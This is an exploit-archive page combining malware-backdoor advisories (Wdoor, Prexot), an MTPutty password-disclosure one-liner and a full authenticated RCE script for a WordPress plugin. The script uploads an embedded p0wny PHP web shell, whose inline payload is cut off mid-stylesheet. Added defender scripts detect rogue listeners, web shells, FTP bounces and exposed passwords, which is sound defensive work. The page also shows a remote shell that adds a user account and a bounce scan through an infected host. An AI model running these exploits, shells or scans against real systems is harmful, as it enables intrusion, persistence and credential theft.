<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/55822613e0d0f437f3ebe5c7f4155452.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Wdoor.11<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: Wdoor by F-king listens on TCP port 80. Third-party attackers who can reach the system can run any OS command, hijacking the infected host.<br />Type: PE32<br />MD5: 55822613e0d0f437f3ebe5c7f4155452<br />Vuln ID: MVID-2022-0483<br />Disclosure: 02/08/2022<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 80<br />Get Shell ok!<br /><br />Get host error! SocketMicrosoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\Users\Victim\Desktop>whoami<br />whoami<br />desktop-2c3iqho\victim<br /><br />C:\Users\Victim\Desktop>net user HYP3RLINX 666 /add<br />net user HYP3RLINX 666 /add<br />The command completed successfully.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
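<p>The three Malvuln advisories on this page (Freddy, Prexot, Wdoor) share one host-side signal: a process that should not own a socket is listening on a TCP port. The following is an added example and not part of the advisories: it joins <code>netstat -ano</code> output with a process listing (a constructed <code>pid,name,path</code> CSV of the kind one exports from wmic or PowerShell) and flags listeners started from user-writable paths, system image names running outside System32 (the dropped <code>services.exe</code> masquerade), image names matching the advisories' dropped files, and the advisories' high ports. Port 80 from the Wdoor entry is deliberately not keyed on alone, since legitimate web servers bind it; the path rules carry that case. Ports and dropped-file names come from the advisories; the allowlist, the sample output and the PIDs are constructed.</p>

```python
from typing import Dict, List, Tuple

# High ports named in the Freddy and Prexot advisories above.
BACKDOOR_PORTS = {19535: 'Backdoor.Win32.Freddy.2001',
                  11404: 'Backdoor.Win32.Prexot.a', 19545: 'Backdoor.Win32.Prexot.a',
                  17001: 'Backdoor.Win32.Prexot.a', 10110: 'Backdoor.Win32.Prexot.a'}
# "Dropped files" from the advisories; services.exe is also a genuine Windows binary.
DROPPED_FILES = {'sycon2.exe', 'services.exe', 'mstempf.exe'}
SYSTEM_DIR = 'c:\\windows\\system32\\'
# Image names expected to own sockets when, and only when, they run from System32
# (assumption: a reviewed per-host allowlist replaces this set in practice).
SYSTEM_IMAGES = {'svchost.exe', 'lsass.exe', 'services.exe', 'wininit.exe'}


def parse_netstat(text: str) -> List[Tuple[int, int]]:
    """(local port, pid) for every TCP LISTENING line of `netstat -ano` output."""
    out = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == 'TCP' and parts[3] == 'LISTENING':
            out.append((int(parts[1].rsplit(':', 1)[1]), int(parts[4])))
    return out


def parse_processes(text: str) -> Dict[int, Tuple[str, str]]:
    """pid -> (image name, full path), lower-cased, from 'pid,name,path' CSV lines."""
    procs = {}
    for line in text.splitlines():
        if not line or line.startswith('pid,'):
            continue
        pid, name, path = line.split(',', 2)
        procs[int(pid)] = (name.lower(), path.lower())
    return procs


def triage(netstat_text: str, process_text: str) -> List[Dict]:
    procs = parse_processes(process_text)
    findings = []
    for port, pid in parse_netstat(netstat_text):
        name, path = procs.get(pid, ('<unknown>', ''))
        from_system32 = name in SYSTEM_IMAGES and path.startswith(SYSTEM_DIR)
        reasons = []
        if name in SYSTEM_IMAGES and not from_system32:
            reasons.append('system image name running outside System32 (masquerade)')
        if path.startswith('c:\\users\\') or '\\temp\\' in path:
            reasons.append('listener started from a user-writable path')
        if name in DROPPED_FILES and name not in SYSTEM_IMAGES:
            reasons.append('image name matches a dropped file from the advisories')
        if port in BACKDOOR_PORTS and not from_system32:
            reasons.append('port %d is associated with %s' % (port, BACKDOOR_PORTS[port]))
        if reasons:
            findings.append({'port': port, 'pid': pid, 'image': name, 'path': path,
                             'reasons': reasons})
    return findings


# Constructed sample output; PIDs, paths and the update.exe name are made up.
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       5120
  TCP    0.0.0.0:19535          0.0.0.0:0              LISTENING       4410
  TCP    0.0.0.0:10110          0.0.0.0:0              LISTENING       3308
  TCP    192.168.18.129:49712   203.0.113.5:443        ESTABLISHED     2204
"""
PROCESS_SAMPLE = """\
pid,name,path
912,svchost.exe,C:\\Windows\\System32\\svchost.exe
5120,update.exe,C:\\Users\\Victim\\AppData\\Roaming\\update.exe
4410,sycon2.exe,C:\\Users\\Victim\\AppData\\Local\\Temp\\sycon2.exe
3308,services.exe,C:\\Windows\\Temp\\services.exe
2204,firefox.exe,C:\\Program Files\\Mozilla Firefox\\firefox.exe
"""

if __name__ == '__main__':
    for f in triage(NETSTAT_SAMPLE, PROCESS_SAMPLE):
        print('port %(port)d pid %(pid)d %(image)s: %(reasons)s' % f)
```

<p>The svchost listener from System32 produces nothing, the port-80 listener is caught only by its path, and the Temp-resident <code>services.exe</code> is reported as a masquerade even though its name is on the allowlist, which is the case a name-only check would miss.</p>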
<pre><code># Exploit Title: Wordpress Plugin Catch Themes Demo Import 1.6.1 - Remote Code Execution (RCE) (Authenticated)<br /># Date 07.12.2021<br /># Exploit Author: Ron Jost (Hacker5preme)<br /># Vendor Homepage: https://wordpress.org/plugins/catch-themes-demo-import/<br /># Software Link: https://downloads.wordpress.org/plugin/catch-themes-demo-import.1.6.1.zip<br /># Version: <= 1.6.1<br /># Tested on: Ubuntu 18.04<br /># CVE: CVE-2021-39352<br /># CWE: CWE-434<br /># Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-39352/README.md<br /><br /><br />'''<br />Description:<br />The Catch Themes Demo Import WordPress plugin is vulnerable to arbitrary file uploads via the import functionality<br />found in the ~/inc/CatchThemesDemoImport.php file, in versions up to 1.7,<br />due to insufficient file type validation. This makes it possible for an attacker with administrative privileges to upload<br />malicious files that can be used to achieve remote code execution.<br />'''<br /><br /># Banner:<br />banner = """<br /> ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ <br />||C |||V |||E |||- |||2 |||0 |||2 |||1 |||- |||3 |||9 |||3 |||5 |||2 ||<br />||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||<br />|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|<br /><br /> [+] Catch Themes Demo Import RCE (Authenticated) <br /> [@] Developed by Ron Jost (Hacker5preme)<br /> <br />"""<br />print(banner)<br /><br /><br />import argparse<br />import requests<br />from datetime import datetime<br /><br /># User-Input:<br />my_parser = argparse.ArgumentParser(description='Wordpress Plugin Catch Themes Demo Import - RCE (Authenticated)')<br />my_parser.add_argument('-T', '--IP', type=str)<br />my_parser.add_argument('-P', '--PORT', type=str)<br />my_parser.add_argument('-U', '--PATH', type=str)<br />my_parser.add_argument('-u', '--USERNAME', type=str)<br 
/>my_parser.add_argument('-p', '--PASSWORD', type=str)<br />args = my_parser.parse_args()<br />target_ip = args.IP<br />target_port = args.PORT<br />wp_path = args.PATH<br />username = args.USERNAME<br />password = args.PASSWORD<br />print('')<br />print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))<br />print('')<br /><br /># Authentication:<br />session = requests.Session()<br />auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'<br />check = session.get(auth_url)<br /># Header:<br />header = {<br /> 'Host': target_ip,<br /> 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',<br /> 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',<br /> 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',<br /> 'Accept-Encoding': 'gzip, deflate',<br /> 'Content-Type': 'application/x-www-form-urlencoded',<br /> 'Origin': 'http://' + target_ip,<br /> 'Connection': 'close',<br /> 'Upgrade-Insecure-Requests': '1'<br />}<br /><br /># Body:<br />body = {<br /> 'log': username,<br /> 'pwd': password,<br /> 'wp-submit': 'Log In',<br /> 'testcookie': '1'<br />}<br />auth = session.post(auth_url, headers=header, data=body)<br /><br /># Get Security nonce value:<br />check = session.get('http://' + target_ip + ':' + target_port + wp_path+ 'wp-admin/themes.php?page=catch-themes-demo-import').text<br />nonce = check[check.find('ajax_nonce"') + 13:]<br />wp_nonce = nonce[:nonce.find('"')]<br />print(wp_nonce)<br /><br /># Exploit:<br />exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php'<br /><br /># Header (Exploit):<br />header = {<br /> "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0",<br /> "Accept": "*/*",<br /> "Accept-Language": "de,en-US;q=0.7,en;q=0.3",<br /> "Accept-Encoding": "gzip, deflate",<br /> 'Referer': 'http://' + target_ip + 
'/wordpress/wp-admin/themes.php?page=catch-themes-demo-import',<br /> "X-Requested-With": "XMLHttpRequest",<br /> "Content-Type": "multipart/form-data; boundary=---------------------------121585879226594965303252407916",<br /> "Origin": "http://" + target_ip,<br /> "Connection": "close"<br />}<br /><br /># Exploit Payload (Using p0wny shell: https://github.com/flozz/p0wny-shell):<br />shell_payload = "-----------------------------121585879226594965303252407916\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nctdi_import_demo_data\r\n-----------------------------121585879226594965303252407916\r\nContent-Disposition: form-data; name=\"security\"\r\n\r\n" + wp_nonce + "\r\n-----------------------------121585879226594965303252407916\r\nContent-Disposition: form-data; name=\"selected\"\r\n\r\nundefined\r\n-----------------------------121585879226594965303252407916\r\nContent-Disposition: form-data; name=\"content_file\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n 
);\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-<br />session.post(exploit_url, headers=header, data=shell_payload)<br />print('[*] Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))<br />print(' -> Webshell: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/' + 
str(datetime.now().strftime('%Y')) + '/' + str(datetime.now().strftime('%m')) + '/shell.php')<br />print('')<br /> <br /></code></pre>
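A defender-side counterpart to the script above, added here as an illustration (it is not part of the advisory's exploit and not code from the p0wny shell project): the upload lands in wp-content/uploads/&lt;year&gt;/&lt;month&gt;/shell.php and is then driven over HTTP, so a web-server access log shows PHP being requested from a directory that should only ever serve media. The multipart body of the admin-ajax.php request is not in an access log, so the check looks for that post-upload traffic. The log lines, addresses and paths in the block are constructed for the example.

```python
"""Detect PHP executed from wp-content/uploads in web-server access logs.

Added illustration, not part of the advisory's exploit script above. The
script drops shell.php into wp-content/uploads/<year>/<month>/, a tree that
should only serve media, so any request for a PHP path there is a strong
indicator of a web shell. Log lines below are constructed, in Apache
"combined" format.
"""
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed sample access log (addresses and paths are illustrative).
SAMPLE_LOG = """\
192.168.18.5 - - [08/Feb/2022:10:01:02 +0000] "GET /wordpress/wp-content/uploads/2022/02/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.18.5 - - [08/Feb/2022:10:01:10 +0000] "POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1" 200 15 "-" "Mozilla/5.0"
192.168.18.5 - - [08/Feb/2022:10:01:15 +0000] "GET /wordpress/wp-content/uploads/2022/02/shell.php HTTP/1.1" 200 3301 "-" "Mozilla/5.0"
192.168.18.5 - - [08/Feb/2022:10:01:20 +0000] "POST /wordpress/wp-content/uploads/2022/02/shell.php?feature=shell HTTP/1.1" 200 88 "-" "Mozilla/5.0"
192.168.18.9 - - [08/Feb/2022:10:02:00 +0000] "GET /wordpress/wp-login.php HTTP/1.1" 200 2400 "-" "Mozilla/5.0"
this line is not a log entry
"""

# Combined format: client, identity, user, [time], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Extensions a PHP handler commonly maps; a trailing path-info segment is allowed.
PHP_UNDER_UPLOADS_RE = re.compile(
    r"/wp-content/uploads/.*\.(?:php\d|php|phtml|phar)(?:/|$)", re.I
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def is_php_under_uploads(target):
    """True if the request path (query string ignored) is a PHP file inside uploads."""
    path = urlsplit(target).path
    return PHP_UNDER_UPLOADS_RE.search(path) is not None


def scan_log(text):
    """Return a finding for every request that executes PHP from the uploads tree."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None or not is_php_under_uploads(entry["target"]):
            continue
        findings.append({
            "ip": entry["ip"],
            "method": entry["method"],
            "path": urlsplit(entry["target"]).path,
            "status": entry["status"],
            # 200 means the shell ran; a 403/404 still shows someone probing for it.
            "served": entry["status"] == 200,
        })
    return findings


def offenders(findings):
    """Count findings per client address, most active first."""
    return Counter(f["ip"] for f in findings).most_common()


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for hit in hits:
        print("{ip} {method} {path} -> {status}".format(**hit))
    print("per-client:", offenders(hits))
```

Running the block prints the two requests for shell.php and the per-client tally. The matching hardening is a web-server rule that refuses to hand .php files under wp-content/uploads to the PHP handler, so that even a successful upload cannot execute.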
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/29bc048d58ab8038c7001ef0d5e69c9b_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Prexot.a<br />Vulnerability: Port Bounce Scan (MITM)<br />Description: The malware listens on random high TCP ports, e.g. 11404, 19545, 17001 or 10110, and accepts any credentials. Third-party intruders who successfully log on can abuse the backdoor's FTP server as a man-in-the-middle machine, allowing PORT command bounce scan attacks using Nmap. This vulnerability lets remote attackers abuse the infected system to discreetly conduct network port scanning. The scanned hosts will then see the scans as originating from the infected system running the malware's FTP server rather than from the intruder.<br />Type: PE32<br />MD5: 29bc048d58ab8038c7001ef0d5e69c9b<br />Vuln ID: MVID-2022-0485<br />Dropped files: services.exe, mstempf.exe<br />Disclosure: 02/08/2022<br /><br /><br />Exploit/PoC:<br />nmap -n -Pn -b malvuln:malvuln@192.168.18.129:19545 -p21,22,80 192.168.18.237 -v<br />Starting Nmap 7.80 ( https://nmap.org ) at 2022-02-07 15:45 UTC-11<br />Resolved FTP bounce attack proxy to 192.168.18.129 (192.168.18.129).<br />Attempting connection to ftp://malvuln:malvuln@192.168.18.129:19545<br />Connected:220 Bot Server (Win32)<br />Login credentials accepted by FTP server!<br />Initiating Bounce Scan at 15:46<br />Attempting connection to ftp://malvuln:malvuln@192.168.18.129:19545<br />Connected:220 Bot Server (Win32)<br />Login credentials accepted by FTP server!<br />Discovered open port 80/tcp on 192.168.18.237<br />Completed Bounce Scan at 15:46, 10.39s elapsed (3 total ports)<br />Nmap scan report for 192.168.18.237<br />Host is up.<br /><br />PORT STATE SERVICE<br />21/tcp closed ftp<br />22/tcp closed ssh<br />80/tcp open http<br /><br />Read data files from: C:\Program Files (x86)\Nmap<br />Nmap done: 1 IP address (1 host up) scanned in 
19.63 seconds<br /></code></pre>
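The Nmap output above shows the backdoor's FTP server honouring PORT commands that name a host other than the client. As an added illustration, not Malvuln's code, the block below performs the check a hardened FTP server makes before opening a data connection (the advertised address must be the control connection's peer, and the data port must not be a privileged port) and runs it over a constructed control-channel transcript that mirrors the scan: a client at 192.168.18.10 sending PORT commands that point at 192.168.18.237 on ports 21, 22 and 80. The transcript, the client address and the port threshold are assumptions for the example.

```python
"""Flag FTP PORT commands that would make the server connect to a third host.

Added illustration for the Prexot advisory above; it is not Malvuln's code.
The bounce scan run with nmap -b works because the backdoor's FTP server
opens data connections to whatever address a PORT command names. The check
below is the one a hardened FTP server applies before honouring PORT. The
session transcript, addresses and threshold are constructed for the example.
"""
import re

# Constructed control-channel transcript: (client address, command as received).
SAMPLE_SESSION = [
    ("192.168.18.10", "USER malvuln"),
    ("192.168.18.10", "PASS malvuln"),
    ("192.168.18.10", "PORT 192,168,18,10,4,1"),    # own address, port 1025: a normal transfer
    ("192.168.18.10", "PORT 192,168,18,237,0,21"),  # third host, port 21: bounce probe
    ("192.168.18.10", "PORT 192,168,18,237,0,22"),
    ("192.168.18.10", "PORT 192,168,18,237,0,80"),
    ("192.168.18.10", "QUIT"),
]

# PORT h1,h2,h3,h4,p1,p2 (RFC 959): four address octets, then port = p1*256 + p2.
PORT_RE = re.compile(
    r"^PORT\s+(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\s*$", re.I
)


def parse_port(cmd):
    """Return (ip, port) for a well-formed PORT command, else None."""
    m = PORT_RE.match(cmd.strip())
    if not m:
        return None
    fields = [int(x) for x in m.groups()]
    if any(x > 255 for x in fields):
        return None
    ip = ".".join(str(x) for x in fields[:4])
    return ip, fields[4] * 256 + fields[5]


def check_port(client_ip, cmd, min_data_port=1024):
    """Return the reasons to refuse this PORT command (empty list = accept)."""
    parsed = parse_port(cmd)
    if parsed is None:
        return []  # not a PORT command, or malformed: nothing to bounce to
    ip, port = parsed
    reasons = []
    if ip != client_ip:
        reasons.append("address mismatch")      # classic bounce: data socket to a third host
    if port < min_data_port:
        reasons.append("privileged data port")  # real clients listen on ephemeral ports
    return reasons


def audit_session(session):
    """Scan a transcript and report every PORT command that should have been refused."""
    findings = []
    for index, (client_ip, cmd) in enumerate(session):
        reasons = check_port(client_ip, cmd)
        if reasons:
            ip, port = parse_port(cmd)
            findings.append({"line": index, "target": ip, "port": port, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_session(SAMPLE_SESSION):
        print("line {0}: PORT -> {1}:{2} ({3})".format(
            f["line"], f["target"], f["port"], ", ".join(f["reasons"])))
```

Running the block reports the three PORT commands aimed at 192.168.18.237 and accepts the one that names the client's own address. On the network side, the same mismatch (FTP data connections from the infected host to addresses and ports that no control-channel client ever used) is what a sensor watching the backdoor's port would look for.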
<pre><code># Exploit Title: MTPutty 1.0.1.21 - SSH Password Disclosure<br /># Exploit Author: Sedat Ozdemir<br /># Version: 1.0.1.21<br /># Date: 06/12/2021<br /># Vendor Homepage: https://ttyplus.com/multi-tabbed-putty/<br /># Tested on: Windows 10<br /><br />Proof of Concept<br />================<br /><br />Step 1: Open MTPutty and add a new SSH connection.<br />Step 2: Double-click the connection to connect to the server.<br />Step 3: Run “Get-WmiObject Win32_Process | select name, commandline | findstr putty.exe” in PowerShell.<br />Step 4: The hidden password is visible in the PowerShell output.<br /><br /></code></pre>
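Added illustration for the advisory above, not the author's code: the one-liner works because MTPutty hands the connection password to putty.exe as a command-line argument, where any local user able to list processes can read it. The block audits a process list for password-carrying arguments and redacts them before the line is logged. The process records are constructed stand-ins for Get-WmiObject Win32_Process output, and the flag spellings it recognises (-pw for PuTTY and plink, --password and similar for other tools) are assumptions about the tools involved.

```python
"""Audit process command lines for plaintext passwords passed as arguments.

Added illustration for the MTPutty advisory above; it is not the advisory
author's code. The page's PowerShell one-liner reveals the password because
MTPutty launches putty.exe with the password on its command line. The
process records below are a constructed stand-in for Win32_Process output,
and the flag names in CRED_RE are assumed common spellings.
"""
import re

# Constructed process list: (name, commandline), mimicking Win32_Process fields.
SAMPLE_PROCESSES = [
    ("putty.exe", r'"C:\Program Files\PuTTY\putty.exe" -ssh admin@10.0.0.7 -P 22 -pw Sup3rSecret!'),
    ("plink.exe", "plink.exe -batch -pw hunter2 user@10.0.0.8"),
    ("notepad.exe", r"notepad.exe C:\Users\victim\pwlist.txt"),
    ("putty.exe", r'"C:\Program Files\PuTTY\putty.exe" -load "prod-db"'),
    ("backup.exe", 'backup.exe --password="p@ss word" --target=\\\\srv\\share'),
]

# A credential-bearing flag followed by its value, either as the next argument
# or attached with '=' / ':'. Quoted values are captured whole.
CRED_RE = re.compile(
    r'(?P<flag>(?<![\w-])--?(?:password|passwd|pass|pw))'
    r'(?P<sep>[=:]|\s+)'
    r'(?P<value>"[^"]*"|\S+)',
    re.IGNORECASE,
)


def find_credential_args(commandline):
    """Return [(flag, value), ...] for every password-style argument found."""
    return [(m.group("flag"), m.group("value")) for m in CRED_RE.finditer(commandline)]


def redact(commandline):
    """Replace each password value so the line is safe to write to a log or ticket."""
    return CRED_RE.sub(lambda m: m.group("flag") + m.group("sep") + "<redacted>", commandline)


def audit_processes(processes):
    """Report every process exposing a password via its arguments, values redacted."""
    findings = []
    for name, commandline in processes:
        hits = find_credential_args(commandline)
        if hits:
            findings.append({
                "name": name,
                "flags": [flag for flag, _ in hits],
                "commandline": redact(commandline),
            })
    return findings


if __name__ == "__main__":
    for f in audit_processes(SAMPLE_PROCESSES):
        print("{name}: {flags} -> {commandline}".format(**f))
```

Running the block lists the PuTTY, plink and backup entries with their values replaced, and leaves the notepad and saved-session entries alone. The application-side fix is to pass secrets through an agent, a protected file or standard input rather than argv, because a command line is readable by every local process.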